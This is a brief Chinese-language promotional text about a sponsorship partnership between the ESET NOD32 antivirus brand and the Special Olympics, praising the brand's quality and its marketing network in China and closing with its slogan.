此次ESET NOD32與特奧會合作的意義深遠。首先,這次合作證明了NOD32的品質得到了國際大型比賽的認可。其次,說明了ESET NOD32在中國的營銷體系的成熟運作。完善的營銷體系是本地化服務的一個基礎前提,這意味著本地消費者可以更好地享受到ESET NOD32的服務。最後,我們都知道一個産品的品質以及取得消費者的認同感都必然是一個積累的過程,所以這次合作也是一個重要契機,為今後其它重要國際賽 事的合作開辟了道路。

請記住我們的口號:我們為數字世界提供保護。